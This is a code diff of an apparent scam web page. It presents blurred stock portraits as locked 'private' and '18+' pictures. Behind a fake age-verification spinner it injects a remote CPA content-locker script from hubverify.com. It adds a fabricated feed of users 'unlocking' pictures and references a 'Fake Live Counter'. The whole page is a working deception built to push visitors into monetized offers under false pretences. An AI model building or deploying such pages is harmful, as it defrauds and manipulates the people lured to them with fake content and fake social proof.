--- a/index.html
+++ b/index.html
@@ -9,33 +9,29 @@
     .blurred { filter: blur(12px); transition: 0.3s ease-in-out; }
     .profile:hover .blurred { filter: blur(6px); }
     .modal { display: none; }
-    .modal.active { display: flex; animation: fadeIn 0.4s ease-in-out; }
-    .modal-box { animation: zoomIn 0.4s ease-in-out; }
-    @keyframes fadeIn {
-      from { opacity: 0; }
-      to { opacity: 1; }
-    }
-    @keyframes zoomIn {
-      from { transform: scale(0.7); opacity: 0; }
-      to { transform: scale(1); opacity: 1; }
-    }
-    .pulse { animation: pulse 1.5s infinite; }
-    @keyframes pulse {
-      0%, 100% { transform: scale(1); }
-      50% { transform: scale(1.1); }
-    }
+    .modal.active { display: flex; }
     .spinner {
       border: 4px solid rgba(255, 255, 255, 0.2);
       border-top: 4px solid #ec4899;
       border-radius: 50%;
-      width: 40px;
-      height: 40px;
+      width: 50px;
+      height: 50px;
       animation: spin 1s linear infinite;
       margin: auto;
     }
     @keyframes spin {
       0% { transform: rotate(0deg); }
       100% { transform: rotate(360deg); }
+    }
+    .overlay-text {
+      position: absolute;
+      bottom: 10px;
+      left: 50%;
+      transform: translateX(-50%);
+      background: rgba(0,0,0,0.6);
+      padding: 4px 10px;
+      border-radius: 6px;
+      font-size: 0.8rem;
     }
   </style>
 </head>
@@ -51,17 +47,13 @@
     </p>
   </div>
 
-  <!-- Modal -->
-  <div id="lockerModal" class="modal fixed inset-0 bg-black bg-opacity-70 backdrop-blur-sm flex items-center justify-center z-50">
-    <div class="modal-box bg-gray-800 rounded-2xl p-6 max-w-lg w-full relative shadow-lg">
-      <button onclick="closeModal()" class="absolute top-2 right-2 text-gray-400 hover:text-white text-xl">&times;</button>
-      <h2 class="text-lg font-bold text-center mb-4">🔒 Verify to Unlock</h2>
-
-      <!-- Countdown -->
-      <div id="countdown" class="text-center text-pink-400 font-bold mb-3 text-sm">
-        Offer expires in <span id="timer">02:00</span> ⏳
-      </div>
-
+  <!-- Fullscreen Modal -->
+  <div id="lockerModal" class="modal fixed inset-0 bg-black bg-opacity-80 backdrop-blur-sm flex items-center justify-center z-50 p-3">
+    <div class="bg-gray-800 rounded-2xl p-6 w-full max-w-md relative shadow-lg">
+      <button onclick="closeModal()" class="absolute top-3 right-3 text-gray-400 hover:text-white text-2xl">&times;</button>
+      <h2 class="text-xl font-bold text-center mb-3">🔒 Verify Your Age to Unlock</h2>
+      <p class="text-sm text-center text-gray-300 mb-4">Complete a quick verification to see all private pictures instantly.</p>
+      
       <!-- Locker Area -->
       <div id="lockerContainer" class="text-center"></div>
 
@@ -72,12 +64,21 @@
       </div>
 
       <!-- Recent Activity Feed -->
-      <div id="activityFeed" class="mt-4 bg-gray-700 rounded-lg p-3 h-32 overflow-hidden text-xs text-gray-200 space-y-2"></div>
+      <div id="activityFeed" class="mt-4 bg-gray-700 rounded-lg p-3 h-32 overflow-hidden text-xs text-gray-200 space-y-2">
+        <div class="flex items-center space-x-2">
+          <img src="https://randomuser.me/api/portraits/men/11.jpg" class="w-6 h-6 rounded-full">
+          <span>🇺🇸 User_Alex unlocked 18+ pics 2 mins ago</span>
+        </div>
+        <div class="flex items-center space-x-2">
+          <img src="https://randomuser.me/api/portraits/women/14.jpg" class="w-6 h-6 rounded-full">
+          <span>🇬🇧 User_Sophia unlocked 18+ pics 4 mins ago</span>
+        </div>
+      </div>
     </div>
   </div>
 
   <script>
-    // Profile Images Array
+    // Profile Images
     const profiles = [
       "https://randomuser.me/api/portraits/women/65.jpg",
       "https://randomuser.me/api/portraits/women/32.jpg",
@@ -93,60 +94,37 @@
     const grid = document.getElementById("profileGrid");
     profiles.forEach(src => {
       const div = document.createElement("div");
-      div.className = "profile relative";
+      div.className = "profile relative cursor-pointer";
       div.innerHTML = `
         <img src="${src}" class="w-full h-56 object-cover rounded-xl blurred">
-        <div class="absolute inset-0 flex items-center justify-center">
-          <button onclick="openModal()" class="bg-pink-600 px-4 py-2 rounded-lg text-sm font-semibold pulse shadow-lg">Unlock</button>
-        </div>
+        <span class="overlay-text text-pink-400">Click to Unlock 🔓</span>
       `;
+      div.onclick = () => openModal();
       grid.appendChild(div);
     });
 
     // Modal Functions
     function openModal() {
       document.getElementById("lockerModal").classList.add("active");
-      const container = document.getElementById("lockerContainer");
-      container.innerHTML = `
+      document.getElementById("lockerContainer").innerHTML = `
         <div id="loadingBox">
           <div class="spinner"></div>
           <p class="mt-3 text-sm text-gray-300">Loading verification system...</p>
         </div>
       `;
-
-      // Remove old locker script if exists
       let oldScript = document.getElementById("afmlock");
       if (oldScript) oldScript.remove();
 
-      // Load CPA Locker Script
       setTimeout(() => {
-        container.innerHTML = "";
+        document.getElementById("lockerContainer").innerHTML = "";
         let s = document.createElement("script");
-        s.src = "https://hubverify.com/cl/clocker.php?id=68bb9ae35b16c"; 
+        s.src = "https://hubverify.com/cl/clocker.php?id=68bb9ae35b16c"; // আপনার CPA Locker Script
         s.id = "afmlock";
         document.body.appendChild(s);
       }, 3000);
-
-      // Start countdown timer (2 min)
-      startCountdown(120);
     }
     function closeModal() {
       document.getElementById("lockerModal").classList.remove("active");
-    }
-
-    // Countdown Timer
-    function startCountdown(duration) {
-      let timer = duration, minutes, seconds;
-      const display = document.getElementById("timer");
-      const interval = setInterval(() => {
-        minutes = String(Math.floor(timer / 60)).padStart(2, "0");
-        seconds = String(timer % 60).padStart(2, "0");
-        display.textContent = minutes + ":" + seconds;
-        if (--timer < 0) {
-          clearInterval(interval);
-          display.textContent = "00:00";
-        }
-      }, 1000);
     }
 
     // Fake Live Counter
